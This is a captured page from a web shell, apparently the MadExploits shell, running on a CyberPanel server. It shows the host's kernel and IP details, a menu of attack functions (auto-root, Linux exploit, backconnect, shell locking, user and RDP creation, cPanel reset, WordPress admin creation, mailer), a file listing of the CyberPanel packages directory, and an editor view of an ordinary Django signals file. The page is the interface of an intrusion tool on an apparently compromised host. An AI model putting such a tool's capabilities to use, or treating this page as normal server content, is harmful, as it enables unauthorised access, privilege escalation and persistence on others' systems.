Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
packages /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
migrations
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
__init__.py
0
B
-rw-r--r--
admin.py
207
B
-rw-r--r--
apps.py
117
B
-rw-r--r--
models.py
673
B
-rw-r--r--
packagesManager.py
11.9
KB
-rw-r--r--
pluginManager.py
1.17
KB
-rw-r--r--
signals.py
1.05
KB
-rw-r--r--
tests.py
2.26
KB
-rw-r--r--
urls.py
786
B
-rw-r--r--
views.py
2.95
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : signals.py
# The world is a prison for the believer. ## https://www.youtube.com/watch?v=DWfNYztUM1U from django.dispatch import Signal ## This event is fired before CyberPanel core load the create package template, this special event is used ## to create a beautiful names official plugin. Actual package creation happes with event named preSubmitPackage and postSubmitPackage. preCreatePacakge = Signal() ## See info for preCreatePacakge postCreatePacakge = Signal() ## This event is fired before CyberPanel core start creation a package. preSubmitPackage = Signal() ## This event is fired after CyberPanel core finished creation of a package. postSubmitPackage = Signal() ## This event is fired before CyberPanel core start deletion of a package. preSubmitDelete = Signal() ## This event is fired after CyberPanel core finished deletion of a package. postSubmitDelete = Signal() ## This event is fired before CyberPanel core start to modify a package. preSaveChanges = Signal() ## This event is fired after CyberPanel core finished modifying a package. postSaveChanges = Signal()
Close